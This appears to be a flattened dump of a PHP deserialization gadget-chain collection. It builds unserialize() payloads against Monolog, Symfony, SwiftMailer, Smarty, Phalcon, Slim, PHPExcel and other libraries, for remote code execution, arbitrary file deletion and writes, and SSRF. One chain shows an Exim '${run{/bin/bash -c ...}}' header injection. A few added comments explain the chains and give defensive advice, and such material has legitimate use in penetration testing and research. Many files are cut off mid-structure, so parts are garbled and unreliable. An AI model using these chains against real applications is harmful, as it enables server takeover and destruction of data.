29 | { 30 | $this->processors = $methods; 31 | $this->buffer = [$command]; 32 | $this->handler = $this; 33 | } 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /gadgetchains/Monolog/RCE/3/chain.php: -------------------------------------------------------------------------------- 1 | null] 19 | ); 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /gadgetchains/Monolog/RCE/3/gadgets.php: -------------------------------------------------------------------------------- 1 | processors = $methods; 17 | 18 | } 19 | } 20 | 21 | class BufferHandler 22 | { 23 | protected $handler; 24 | protected $bufferSize = -1; 25 | protected $buffer; 26 | 27 | # ($record['level'] < $this->level) == false 28 | protected $level = null; 29 | protected $bubble = false; 30 | protected $formatter = null; 31 | protected $processors; 32 | 33 | function __construct($methods, $command) 34 | { 
35 | $this->processors = null; 36 | $this->buffer = [$command]; 37 | $this->handler = new NativeMailerHandler($methods); 38 | } 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /gadgetchains/Monolog/RCE/4/chain.php: -------------------------------------------------------------------------------- 1 | hasRecords = true; 13 | $this->rollbarLogger = $buffer; 14 | } 15 | } 16 | 17 | class BufferHandler 18 | { 19 | protected $bufferSize; 20 | protected $handler; 21 | protected $buffer; 22 | 23 | public function __construct($buffer) 24 | { 25 | $this->bufferSize = 2; 26 | $this->handler = $buffer; 27 | $this->buffer = [0 => array("level" => 100, 28 | "message" => 1, 29 | "context" => [], 30 | "extra" => [], 31 | "channel" => 1)]; 32 | } 33 | } 34 | 35 | class NativeMailerHandler 36 | { 37 | protected $level; 38 | protected $processors; 39 | protected $formatter; 40 | protected $maxColumnWidth; 41 | protected $parameters; 42 | protected $to; 43 | protected $headers; 44 | 45 | public function __construct($command) 46 | { 47 | $this->level = 1; 48 | $this->processors = ["array_reverse"]; 49 | // if $this->buffer[0] is carefully crafted 50 | // $this->format can be used to pass a payload through the 'body' parameter 51 | // via the LineFormatter 52 | // Here we used the headers param to pass the payload 53 | $this->formatter = new \Monolog\Formatter\LineFormatter(); 54 | $this->maxColumnWidth = 20; 55 | $this->parameters = ["-be"]; 56 | $this->headers = ['${run{/bin/bash -c "'.$command.'"}{yes}{no}}']; 57 | $this->to = ["init@localhost"]; 58 | } 59 | } 60 | } 61 | 62 | namespace Monolog\Formatter 63 | { 64 | class LineFormatter 65 | { 66 | protected $format; 67 | public function __construct() 68 | { 69 | $this->format = ""; 70 | } 71 | } 72 | } 73 | 74 | -------------------------------------------------------------------------------- /gadgetchains/Monolog/RCE/5/chain.php: 
-------------------------------------------------------------------------------- 1 | __destruct() => close() => flushBuffer() => handleBatch($records) 7 | 8 | /* Review note: property-only stand-in for Monolog's FingersCrossedHandler. Its constructor sets $passthruLevel to 0, places $param inside a single buffered record and stores $handler; no methods are defined, so any behaviour comes from the real library class once such an object is unserialized (the destructor call path is the one listed just before this class). */ class FingersCrossedHandler { 9 | protected $passthruLevel; 10 | protected $buffer = array(); 11 | protected $handler; 12 | 13 | public function __construct($param, $handler) 14 | { 15 | $this->passthruLevel = 0; 16 | $this->buffer = ['test' => [$param, 'level' => null]]; 17 | $this->handler = $handler; 18 | } 19 | 20 | } 21 | 22 | /* Review note: stand-in for GroupHandler with $processors preset to ['current', $function]. Presumably the library applies each processor to a record as a callable - confirm against the Monolog release in use. Defensive takeaway: keep untrusted bytes away from unserialize(); where it cannot be removed, pass the allowed_classes option so handler classes like this one are never instantiated. */ class GroupHandler { 23 | protected $processors = array(); 24 | public function __construct($function) 25 | { 26 | $this->processors = ['current', $function]; 27 | } 28 | 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /gadgetchains/Monolog/RCE/6/chain.php: -------------------------------------------------------------------------------- 1 | __destruct() => close() => flushBuffer() => handleBatch($records) 7 | 8 | class FingersCrossedHandler { 9 | protected $passthruLevel; 10 | protected $buffer = array(); 11 | protected $handler; 12 | 13 | public function __construct($param, $handler) 14 | { 15 | $this->passthruLevel = 0; 16 | $this->buffer = ['test' => [$param, 'level' => null]]; 17 | $this->handler = $handler; 18 | } 19 | 20 | } 21 | 22 | /* Review note: this variant uses BufferHandler as the inner handler. The '#' comments on $level and $bufferLimit name the library conditions that these preset values are meant to keep false. */ class BufferHandler 23 | { 24 | protected $handler; 25 | protected $bufferSize = -1; 26 | protected $buffer; 27 | # ($record['level'] < $this->level) == false 28 | protected $level = null; 29 | protected $initialized = true; 30 | # ($this->bufferLimit > 0 && $this->bufferSize === $this->bufferLimit) == false 31 | protected $bufferLimit = -1; 32 | protected $processors; 33 | 34 | function __construct($function) 35 | { 36 | $this->processors = ['current', $function]; 37 | } 38 | } 39 | 40 | } 41 | -------------------------------------------------------------------------------- /gadgetchains/Monolog/RCE/7/chain.php: -------------------------------------------------------------------------------- 1
| 0] 20 | ); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /gadgetchains/Monolog/RCE/7/gadgets.php: -------------------------------------------------------------------------------- 1 | processors = $methods; 14 | $this->buffer = [$command]; 15 | $this->handler = $this; 16 | } 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /gadgetchains/PHPCSFixer/FD/1/chain.php: -------------------------------------------------------------------------------- 1 | files = [$remote_path => $remote_path]; 12 | 13 | } 14 | 15 | } 16 | } 17 | 18 | /* Review note: the commented-out code that follows is the library behaviour this entry relies on: __destruct() calls clean(), which unlink()s every key of $this->files and suppresses errors with @. When the object is rebuilt from untrusted serialized data, those keys are chosen by whoever supplied the data, so the impact is file deletion with the PHP process's permissions. A common library-side fix is to refuse unserialization in __wakeup() or __unserialize(); applications should not pass untrusted input to unserialize() at all. */ /* 19 | public function __destruct() 20 | { 21 | $this->clean(); 22 | } 23 | 24 | 25 | 26 | 27 | public function clean() 28 | { 29 | foreach ($this->files as $file => $value) { 30 | $this->unlink($file); 31 | } 32 | $this->files = []; 33 | } 34 | 35 | private function unlink($path) 36 | { 37 | @unlink($path); 38 | } 39 | } 40 | */ 41 | 42 | 43 | ?> 44 | -------------------------------------------------------------------------------- /gadgetchains/PHPCSFixer/FD/2/chain.php: -------------------------------------------------------------------------------- 1 | temporaryFile = $remote_path; 11 | $this->fileRemoval = new \PhpCsFixer\FileRemoval(); 12 | 13 | } 14 | 15 | /* 16 | public function __destruct() 17 | { 18 | if (null !== $this->temporaryFile) { 19 | $this->fileRemoval->delete($this->temporaryFile); 20 | } 21 | } 22 | */ 23 | 24 | } 25 | } 26 | 27 | namespace PhpCsFixer 28 | { 29 | 30 | //https://github.com/FriendsOfPHP/PHP-CS-Fixer/blob/v2.17.3/src/FileRemoval.php 31 | /* Review note: local re-declaration of FileRemoval (the URL in the comment before it pins v2.17.3). delete() drops the path from $this->files when present and then unlink()s it with errors suppressed. */ class FileRemoval 32 | 33 | { 34 | 35 | public function delete($path) 36 | { 37 | if (isset($this->files[$path])) 38 | { 39 | unset($this->files[$path]); 40 | } 41 | $this->unlink($path); 42 | } 43 | private function unlink($path) 44 | { 45 | @unlink($path); 46 | } 47 | 48 | } 49 | } 50 | 51 | /* 52 | public function delete($path) 53 | { 54 | if
(isset($this->files[$path])) { 55 | unset($this->files[$path]); 56 | } 57 | $this->unlink($path); 58 | } 59 | 60 | */ 61 | 62 | ?> 63 | -------------------------------------------------------------------------------- /gadgetchains/PHPExcel/FD/1/chain.php: -------------------------------------------------------------------------------- 1 | fileName = $filePath; 10 | } 11 | 12 | /* Review note: the quoted destructor below closes $this->fileHandle when it is non-null and then unlink()s $this->fileName. Both properties are restored from the serialized object, so the deleted path is whatever the serialized data says. The surviving constructor fragment only assigns the file name; how the handle is populated is not visible in this extract. */ /* 13 | public function __destruct() { 14 | if (!is_null($this->fileHandle)) { 15 | fclose($this->fileHandle); // Will only produce a warning 16 | unlink($this->fileName); 17 | } 18 | $this->fileHandle = null; 19 | } 20 | */ 21 | } -------------------------------------------------------------------------------- /gadgetchains/PHPExcel/FD/2/chain.php: -------------------------------------------------------------------------------- 1 | _fileName = $filePath; 10 | } 11 | 12 | /* 13 | public function __destruct() { 14 | if (!is_null($this->_fileHandle)) { 15 | fclose($this->_fileHandle); // Will only produce a warning 16 | unlink($this->_fileName); 17 | } 18 | $this->_fileHandle = null; 19 | } // function __destruct() 20 | */ 21 | } -------------------------------------------------------------------------------- /gadgetchains/PHPExcel/FD/3/chain.php: -------------------------------------------------------------------------------- 1 | tempFileName = $filePath; 9 | } 10 | 11 | /* Review note: in this variant the quoted destructor unlink()s $this->tempFileName whenever it is not the empty string, with warnings suppressed by @, so a deletion triggered this way raises no PHP warning. File-integrity monitoring or filesystem audit logging is the more dependable signal; the fix is to keep untrusted data out of unserialize(). */ /* 12 | public function __destruct() 13 | { 14 | // Unlink temporary files 15 | if ($this->tempFileName != '') { 16 | @unlink($this->tempFileName); 17 | } 18 | } 19 | */ 20 | } -------------------------------------------------------------------------------- /gadgetchains/PHPExcel/FD/4/chain.php: -------------------------------------------------------------------------------- 1 | _tempFileName = $filePath; 9 | } 10 | 11 | /* 12 | public function __destruct() 13 | { 14 | // Unlink temporary files 15 | if ($this->_tempFileName != '') { 16 | @unlink($this->_tempFileName); 17 | } 18 | } 19 | */ 20 | }
-------------------------------------------------------------------------------- /gadgetchains/Phalcon/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | _shared = false; 10 | $this->_definition = array( 11 | 'className' => '\Phalcon\Mvc\View\Engine\Php', 12 | 'arguments' => array(array('type' => 'parameter', 'value' => 'test')), 13 | 'calls' => array( 14 | array( 15 | 'method' => 'render', 16 | 'arguments' => array( 17 | array( 18 | 'type' => 'parameter', 19 | 'value' => 'php://input' 20 | ), array( 21 | 'type' => 'parameter', 22 | 'value' => array() 23 | ) 24 | ) 25 | ) 26 | ) 27 | ); 28 | } 29 | } 30 | } 31 | 32 | /* Review note: Di stand-in whose only service, 'session', is a \Phalcon\Di\Service object. The definition array that precedes this namespace names \Phalcon\Mvc\View\Engine\Php and a render call on 'php://input'; it presumably belongs to that Service stand-in, but the opening of the file (namespace and class header) was lost in extraction, so confirm against the original. */ namespace Phalcon { 33 | class Di { 34 | protected $_services; 35 | 36 | public function __construct() { 37 | $this->_services = array('session' => new \Phalcon\Di\Service()); 38 | } 39 | } 40 | } 41 | 42 | namespace Phalcon\Http { 43 | class Cookie { 44 | protected $_dependencyInjector; 45 | protected $_name = "test"; 46 | protected $_expire = 0; 47 | protected $_httpOnly = 1; 48 | protected $_readed = true; 49 | protected $_restored = false; 50 | 51 | public function __construct() { 52 | $this->_dependencyInjector = new \Phalcon\Di(); 53 | } 54 | } 55 | } 56 | 57 | /* Review note: File logger stand-in whose $_path holds a Cookie object instead of a string. The "test" argument passed to Cookie is ignored, because the Cookie stand-in declares a constructor without parameters. Defensive takeaway: an object graph like this only matters when untrusted data reaches unserialize(); prefer json_decode() for client-supplied state and, where unserialize() has to stay, pass the allowed_classes option. */ namespace Phalcon\Logger\Adapter { 58 | class File { 59 | protected $_transaction; 60 | protected $_queue; 61 | protected $_formatter; 62 | protected $_logLevel; 63 | protected $_fileHandler; 64 | protected $_path; 65 | protected $_options; 66 | 67 | function __construct() { 68 | $this->_path = new \Phalcon\Http\Cookie("test"); 69 | } 70 | } 71 | } 72 | 73 | -------------------------------------------------------------------------------- /gadgetchains/Pydio/Guzzle/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | [ new \Pydio\Core\Controller\ShutDownScheduler($function, $parameter), 'callRegisteredShutdown'] 18 | ]); 19 | } 20 | } 21 |
-------------------------------------------------------------------------------- /gadgetchains/Pydio/Guzzle/RCE/1/gadgets.php: -------------------------------------------------------------------------------- 1 | methods = $methods; 16 | 17 | foreach ($methods as $name => $fn) { 18 | $this->{'_fn_' . $name} = $fn; 19 | } 20 | } 21 | } 22 | } 23 | 24 | namespace Pydio\Core\Controller 25 | { 26 | class ShutdownScheduler 27 | { 28 | private $callbacks; 29 | public function __construct($function, $parameter) { 30 | $this->callbacks = [[$function, $parameter]]; 31 | } 32 | } 33 | } 34 | 35 | 36 | -------------------------------------------------------------------------------- /gadgetchains/Slim/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | keys = $this->raw = $this->values = $array; 14 | } 15 | } 16 | } 17 | 18 | namespace Slim 19 | { 20 | class App 21 | { 22 | private $container; 23 | 24 | function __construct($container) 25 | { 26 | $this->container = $container; 27 | } 28 | } 29 | 30 | class Container extends \Pimple\Container 31 | { 32 | 33 | } 34 | } 35 | 36 | namespace Slim\Http 37 | { 38 | use \Slim\App; 39 | use \Slim\Container; 40 | 41 | abstract class Message 42 | { 43 | protected $headers; 44 | protected $body = ''; 45 | 46 | function __construct($function, $parameter) 47 | { 48 | $z = new App(new Container(['has' => $function])); 49 | $y = new App($z); 50 | $this->headers = new App(new Container(['all' => [$y, $parameter]])); 51 | } 52 | } 53 | 54 | class Response extends Message 55 | { 56 | 57 | } 58 | } -------------------------------------------------------------------------------- /gadgetchains/Smarty/FD/1/chain.php: -------------------------------------------------------------------------------- 1 | is_locked = false; 12 | unlink($cached->lock_id); 13 | } 14 | } 15 | 16 | class Smarty_Template_Cached 17 | { 18 | public $lock_id = null; 19 | public $is_locked = true; 20 | 21 | public function 
__construct() 22 | { 23 | $this->handler = new Smarty_Internal_CacheResource_File(); 24 | $this->lock_id = ''; 25 | } 26 | 27 | public function setlock($lock_id){ 28 | if($lock_id){ 29 | $this->lock_id = $lock_id; 30 | } 31 | } 32 | } 33 | 34 | class Smarty_Internal_TemplateBase 35 | { 36 | } 37 | 38 | class Smarty extends Smarty_Internal_TemplateBase 39 | { 40 | public $cache_locking = true; 41 | public $cache_dir; 42 | public $use_sub_dirs; 43 | public function __construct(){ 44 | $this->cache_locking = 1; 45 | $this->cache_dir = "/"; 46 | $this->use_sub_dirs = true; 47 | $this->cache = true; 48 | } 49 | } 50 | 51 | class Smarty_Internal_Template extends Smarty_Internal_TemplateBase 52 | { 53 | 54 | public $cached; 55 | public $smarty; 56 | 57 | public function __construct($lock_id){ 58 | $this->smarty = new Smarty(); 59 | $this->cached = new Smarty_Template_Cached(); 60 | $this->setlock($lock_id); 61 | } 62 | 63 | public function setlock($lock_id){ 64 | $this->cached->setlock($lock_id); 65 | } 66 | 67 | } 68 | 69 | ?> 70 | -------------------------------------------------------------------------------- /gadgetchains/Smarty/SSRF/1/chain.php: -------------------------------------------------------------------------------- 1 | 23 | -------------------------------------------------------------------------------- /gadgetchains/Smarty/SSRF/1/gadgets.php: -------------------------------------------------------------------------------- 1 | handler = new SoapClient(null, [ 9 | 'uri' => $res['scheme'] . '://' . $res['host'] . 
'/', 10 | 'location' => $url 11 | ]); 12 | } 13 | } 14 | 15 | class Smarty 16 | { 17 | public $cache_locking = true; 18 | } 19 | 20 | class Smarty_Internal_Template 21 | { 22 | public $cached; 23 | public $smarty; 24 | 25 | public function __construct($url) 26 | { 27 | $this->smarty = new Smarty(); 28 | $this->cached = new Smarty_Template_Cached($url); 29 | } 30 | } 31 | ?> 32 | -------------------------------------------------------------------------------- /gadgetchains/SwiftMailer/FD/1/chain.php: -------------------------------------------------------------------------------- 1 | path = $path; 10 | } 11 | } 12 | 13 | class Swift_ByteStream_TemporaryFileByteStream extends Swift_ByteStream_FileByteStream 14 | { 15 | public function __construct($path) 16 | { 17 | parent::__construct($path); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /gadgetchains/SwiftMailer/FW/1/chain.php: -------------------------------------------------------------------------------- 1 | _encoder = new Swift_Mime_HeaderEncoder_Base64HeaderEncoder(); 20 | $this->_paramEncoder = new Swift_Mime_HeaderEncoder_Base64HeaderEncoder(); 21 | $this->_grammar = new Swift_Mime_Grammar(); 22 | } 23 | } 24 | 25 | class Swift_Mime_SimpleHeaderSet 26 | { 27 | private $_factory; 28 | 29 | function __construct() 30 | { 31 | $this->_factory = new Swift_Mime_SimpleHeaderFactory(); 32 | } 33 | } 34 | 35 | class Swift_Mime_ContentEncoder_RawContentEncoder 36 | { 37 | 38 | } 39 | 40 | class Swift_Mime_SimpleMimeEntity 41 | { 42 | private $_headers; 43 | private $_body; 44 | private $_encoder; 45 | private $_cache; 46 | private $_cacheKey = 'something'; 47 | 48 | function __construct($cache, $body) 49 | { 50 | $this->_cache = $cache; 51 | $this->_body = $body; 52 | $this->_encoder = new Swift_Mime_ContentEncoder_RawContentEncoder(); 53 | $this->_headers = new Swift_Mime_SimpleHeaderSet(); 54 | } 55 | } 56 | 57 | class Swift_Message extends 
Swift_Mime_SimpleMimeEntity 58 | { 59 | private $headerSigners = []; 60 | private $bodySigners = []; 61 | private $savedMessage = []; 62 | 63 | function __construct($headerSigner, $cache, $body) 64 | { 65 | parent::__construct($cache, $body); 66 | $this->headerSigners = [$headerSigner]; 67 | } 68 | } 69 | 70 | class Swift_Signers_DomainKeySigner 71 | { 72 | protected $_privateKey = <<_bound = [$_bound]; 94 | } 95 | } 96 | 97 | class Swift_KeyCache_ArrayKeyCache 98 | { 99 | private $_contents = []; 100 | private $_stream; 101 | 102 | function __construct($_stream) 103 | { 104 | $this->_stream = $_stream; 105 | } 106 | } 107 | 108 | class Swift_KeyCache_SimpleKeyCacheInputStream 109 | { 110 | private $_keyCache; 111 | private $_nsKey = 'something'; 112 | private $_itemKey = 'something'; 113 | private $_writeThrough = null; 114 | 115 | function __construct($_writeThrough) 116 | { 117 | $this->_keyCache = new Swift_KeyCache_ArrayKeyCache(null); 118 | $this->_writeThrough = $_writeThrough; 119 | } 120 | } 121 | 122 | abstract class Swift_ByteStream_AbstractFilterableInputStream 123 | { 124 | } 125 | 126 | class Swift_ByteStream_FileByteStream extends Swift_ByteStream_AbstractFilterableInputStream 127 | { 128 | private $_path; 129 | private $_mode = 'w+b'; 130 | 131 | function __construct($_path) 132 | { 133 | $this->_path = $_path; 134 | } 135 | } -------------------------------------------------------------------------------- /gadgetchains/SwiftMailer/FW/2/chain.php: -------------------------------------------------------------------------------- 1 | encoder = new Swift_Mime_HeaderEncoder_Base64HeaderEncoder(); 20 | $this->paramEncoder = new Swift_Mime_HeaderEncoder_Base64HeaderEncoder(); 21 | $this->grammar = new Swift_Mime_Grammar(); 22 | } 23 | } 24 | 25 | class Swift_Mime_SimpleHeaderSet 26 | { 27 | private $factory; 28 | 29 | function __construct() 30 | { 31 | $this->factory = new Swift_Mime_SimpleHeaderFactory(); 32 | } 33 | } 34 | 35 | class 
Swift_Mime_ContentEncoder_RawContentEncoder 36 | { 37 | 38 | } 39 | 40 | class Swift_Mime_SimpleMimeEntity 41 | { 42 | private $headers; 43 | private $body; 44 | private $encoder; 45 | private $cache; 46 | private $cacheKey = 'something'; 47 | 48 | function __construct($cache, $body) 49 | { 50 | $this->cache = $cache; 51 | $this->body = $body; 52 | $this->encoder = new Swift_Mime_ContentEncoder_RawContentEncoder(); 53 | $this->headers = new Swift_Mime_SimpleHeaderSet(); 54 | } 55 | } 56 | 57 | class Swift_Message extends Swift_Mime_SimpleMimeEntity 58 | { 59 | private $headerSigners = []; 60 | private $bodySigners = []; 61 | private $savedMessage = []; 62 | 63 | function __construct($headerSigner, $cache, $body) 64 | { 65 | parent::__construct($cache, $body); 66 | $this->headerSigners = [$headerSigner]; 67 | } 68 | } 69 | 70 | class Swift_Signers_DomainKeySigner 71 | { 72 | protected $privateKey = <<bound = [$bound]; 94 | } 95 | } 96 | 97 | class Swift_KeyCache_ArrayKeyCache 98 | { 99 | private $contents = []; 100 | private $stream; 101 | 102 | function __construct($stream) 103 | { 104 | $this->stream = $stream; 105 | } 106 | } 107 | 108 | class Swift_KeyCache_SimpleKeyCacheInputStream 109 | { 110 | private $keyCache; 111 | private $nsKey = 'something'; 112 | private $itemKey = 'something'; 113 | private $writeThrough = null; 114 | 115 | function __construct($writeThrough) 116 | { 117 | $this->keyCache = new Swift_KeyCache_ArrayKeyCache(null); 118 | $this->writeThrough = $writeThrough; 119 | } 120 | } 121 | 122 | abstract class Swift_ByteStream_AbstractFilterableInputStream 123 | { 124 | } 125 | 126 | class Swift_ByteStream_FileByteStream extends Swift_ByteStream_AbstractFilterableInputStream 127 | { 128 | private $path; 129 | private $mode = 'w+b'; 130 | 131 | function __construct($path) 132 | { 133 | $this->path = $path; 134 | } 135 | } -------------------------------------------------------------------------------- /gadgetchains/SwiftMailer/FW/3/chain.php: 
-------------------------------------------------------------------------------- 1 | _buffer = $_buffer; 20 | $this->_eventDispatcher = $_eventDispatcher; 21 | } 22 | } 23 | 24 | abstract class Swift_ByteStream_AbstractFilterableInputStream 25 | { 26 | private $_filters = array(); 27 | private $_writeBuffer; 28 | 29 | function __construct($_writeBuffer) 30 | { 31 | $this->_writeBuffer = $_writeBuffer; 32 | } 33 | } 34 | 35 | class Swift_ByteStream_FileByteStream extends Swift_ByteStream_AbstractFilterableInputStream 36 | { 37 | private $_path; 38 | private $_mode = 'w+b'; 39 | 40 | function __construct($_path, $_writeBuffer) 41 | { 42 | parent::__construct($_writeBuffer); 43 | $this->_path = $_path; 44 | } 45 | } -------------------------------------------------------------------------------- /gadgetchains/Symfony/FW/1/chain.php: -------------------------------------------------------------------------------- 1 | token = uniqid(); 19 | $this->ip = new \Symfony\Component\Finder\Expression\Expression( 20 | $path, $content 21 | ); 22 | } 23 | } 24 | } 25 | 26 | namespace Symfony\Component\Finder\Expression 27 | { 28 | class Expression 29 | { 30 | private $value; 31 | 32 | function __construct($path, $content) 33 | { 34 | $this->value = new \Symfony\Component\Console\Helper\Table( 35 | $path, $content 36 | ); 37 | } 38 | } 39 | } 40 | 41 | namespace Symfony\Component\Console\Helper 42 | { 43 | class Table 44 | { 45 | private $headers = ['a']; 46 | private $rows = []; 47 | private $columnWidths = [100]; 48 | private $numberOfColumns; 49 | private $output; 50 | private $style; 51 | private static $styles; 52 | 53 | function __construct($path, $content) 54 | { 55 | $this->output = new \Symfony\Component\Config\ConfigCache($path); 56 | $this->style = new TableStyle($content); 57 | } 58 | } 59 | 60 | class TableStyle 61 | { 62 | private $paddingChar = ' '; 63 | private $horizontalBorderChar = ''; 64 | private $verticalBorderChar; 65 | private $crossingChar = ''; 66 | 
private $cellHeaderFormat = '%s'; 67 | private $cellRowFormat = '%s'; 68 | private $cellRowContentFormat = ' %s '; 69 | private $borderFormat = '%s'; 70 | private $padType = STR_PAD_RIGHT; 71 | 72 | function __construct($verticalBorderChar) 73 | { 74 | $this->verticalBorderChar = $verticalBorderChar; 75 | } 76 | } 77 | } 78 | 79 | namespace Symfony\Component\Config 80 | { 81 | class ConfigCache 82 | { 83 | private $debug; 84 | private $file; 85 | 86 | function __construct($file) 87 | { 88 | $this->file = $file; 89 | } 90 | } 91 | } 92 | -------------------------------------------------------------------------------- /gadgetchains/Symfony/FW/2/chain.php: -------------------------------------------------------------------------------- 1 | state = 1; 23 | $this->skippedFile = 'php://filter/convert.base64-decode/resource=' . $path; 24 | $this->isSkipped = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' . base64_encode($data); 25 | } 26 | } 27 | } -------------------------------------------------------------------------------- /gadgetchains/Symfony/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | deferred = $command; 36 | $this->namespace = []; 37 | } 38 | } 39 | 40 | class ApcuAdapter extends AbstractAdapter 41 | { 42 | } 43 | } -------------------------------------------------------------------------------- /gadgetchains/Symfony/RCE/2/chain.php: -------------------------------------------------------------------------------- 1 | )'; 11 | 12 | public function generate(array $parameters) 13 | { 14 | $code = $parameters['code']; 15 | 16 | return new \Symfony\Component\Process\ProcessPipes( 17 | new \Symfony\Component\Finder\Expression\Expression( 18 | new \Symfony\Component\Templating\PhpEngine( 19 | new \Symfony\Component\Templating\Storage\StringStorage( 20 | $code 21 | )))); 22 | } 23 | } 24 | -------------------------------------------------------------------------------- 
/gadgetchains/Symfony/RCE/2/gadgets.php: -------------------------------------------------------------------------------- 1 | template = ''; 8 | } 9 | } 10 | } 11 | 12 | namespace Symfony\Component\Templating{ 13 | class TemplateNameParser{} 14 | class TemplateReference{} 15 | class PhpEngine{ 16 | protected $parser; 17 | protected $cache; 18 | protected $current; 19 | protected $globals = array(); 20 | public function __construct($s){ 21 | $this->parser = new TemplateNameParser; 22 | $this->current = new TemplateReference; 23 | $this->cache = array(NULL=>$s); 24 | } 25 | } 26 | } 27 | 28 | namespace Symfony\Component\Finder\Expression{ 29 | class Expression{ 30 | private $value; 31 | public function __construct($p){ 32 | $this->value = $p; 33 | } 34 | } 35 | } 36 | 37 | namespace Symfony\Component\Process{ 38 | class ProcessPipes{ 39 | private $files = array(); 40 | public function __construct($e){ 41 | $this->files = array($e); 42 | } 43 | } 44 | } 45 | 46 | ?> 47 | -------------------------------------------------------------------------------- /gadgetchains/Symfony/RCE/3/chain.php: -------------------------------------------------------------------------------- 1 | )'; 11 | 12 | public function generate(array $parameters) 13 | { 14 | $code = $parameters['code']; 15 | 16 | return new \Symfony\Component\Process\Pipes\WindowsPipes( 17 | new \Symfony\Component\Finder\Expression\Expression( 18 | new \Symfony\Component\Templating\PhpEngine( 19 | new \Symfony\Component\Templating\Storage\StringStorage( 20 | $code 21 | )))); 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /gadgetchains/Symfony/RCE/3/gadgets.php: -------------------------------------------------------------------------------- 1 | template = ''; 8 | } 9 | } 10 | } 11 | 12 | namespace Symfony\Component\Templating{ 13 | class TemplateNameParser{} 14 | class TemplateReference{} 15 | class PhpEngine{ 16 | protected $parser; 17 | protected $cache; 18 | 
protected $current; 19 | protected $globals = array(); 20 | public function __construct($s){ 21 | $this->parser = new TemplateNameParser; 22 | $this->current = new TemplateReference; 23 | $this->cache = array(NULL=>$s); 24 | } 25 | } 26 | } 27 | 28 | namespace Symfony\Component\Finder\Expression{ 29 | class Expression{ 30 | private $value; 31 | public function __construct($p){ 32 | $this->value = $p; 33 | } 34 | } 35 | } 36 | 37 | namespace Symfony\Component\Process\Pipes{ 38 | class WindowsPipes{ 39 | private $files = array(); 40 | public function __construct($e){ 41 | $this->files = array($e); 42 | } 43 | } 44 | } 45 | 46 | ?> 47 | -------------------------------------------------------------------------------- /gadgetchains/Symfony/RCE/4/chain.php: -------------------------------------------------------------------------------- 1 | 28 | -------------------------------------------------------------------------------- /gadgetchains/Symfony/RCE/4/gadgets.php: -------------------------------------------------------------------------------- 1 | poolHash = $poolHash; 12 | $this-> innerItem = $parameter; 13 | } 14 | } 15 | } 16 | 17 | namespace Symfony\Component\Cache\Adapter { 18 | 19 | class ProxyAdapter 20 | { 21 | private $poolHash ; 22 | private $setInnerItem; 23 | public function __construct($poolHash, $function) 24 | { 25 | $this-> poolHash = $poolHash; 26 | $this-> setInnerItem = $function; 27 | } 28 | } 29 | 30 | class TagAwareAdapter 31 | { 32 | private $deferred = []; 33 | private $pool; 34 | public function __construct($deferred, $pool) 35 | { 36 | $this-> deferred = $deferred; 37 | $this-> pool = $pool; 38 | } 39 | } 40 | } 41 | 42 | ?> 43 | -------------------------------------------------------------------------------- /gadgetchains/Symfony/RCE/5/chain.php: -------------------------------------------------------------------------------- 1 | createCacheItem = $createCacheItem; 14 | $this->pool = $pool; 15 | $this->namespace = ''; 16 | } 17 | } 18 | 19 | 
20 | class NullAdapter 21 | { 22 | private $createCacheItem; 23 | 24 | public function __construct($createCacheItem) 25 | { 26 | $this->createCacheItem = $createCacheItem; 27 | } 28 | } 29 | } 30 | 31 | namespace Symfony\Component\Console\Helper 32 | { 33 | class Dumper 34 | { 35 | private $handler; 36 | 37 | public function __construct($handler) 38 | { 39 | $this->handler = $handler; 40 | } 41 | } 42 | } 43 | 44 | 45 | namespace Symfony\Component\Cache\Traits 46 | { 47 | class RedisProxy 48 | { 49 | private $redis; 50 | private $initializer; 51 | 52 | public function __construct($initializer, $redis) 53 | { 54 | $this->initializer = $initializer; 55 | $this->redis = $redis; 56 | } 57 | } 58 | } 59 | 60 | namespace Symfony\Component\Form 61 | { 62 | 63 | class FormErrorIterator 64 | { 65 | public $form; 66 | private $errors; 67 | 68 | function __construct($errors, $form) 69 | { 70 | $this->errors = $errors; 71 | $this->form = $form; 72 | } 73 | } 74 | } 75 | 76 | 77 | namespace Symfony\Component\HttpKernel\DataCollector 78 | { 79 | class DumpDataCollector 80 | { 81 | protected $data; 82 | private $stopwatch; 83 | private $fileLinkFormat; 84 | private $dataCount = 0; 85 | private $isCollected = false; 86 | private $clonesCount = 0; 87 | private $clonesIndex = 0; 88 | 89 | public function __construct($function, $command) 90 | { 91 | $this->data = [ 92 | [ 93 | "data" => "1", 94 | "name" => new \Symfony\Component\Form\FormErrorIterator([ 95 | new \Symfony\Component\Form\FormErrorIterator( 96 | [], 97 | new \Symfony\Component\Cache\Traits\RedisProxy( 98 | new \Symfony\Component\Console\Helper\Dumper([ 99 | new \Symfony\Component\Cache\Adapter\ProxyAdapter( 100 | 'dd', // exit function 101 | new \Symfony\Component\Cache\Adapter\NullAdapter($function) 102 | ), 103 | "getItem" 104 | ]), 105 | $command 106 | ) 107 | )], 108 | null 109 | ), 110 | "file" => "3", 111 | "line" => "4" 112 | ], 113 | null, 114 | null 115 | ]; 116 | } 117 | } 118 | } 119 | 
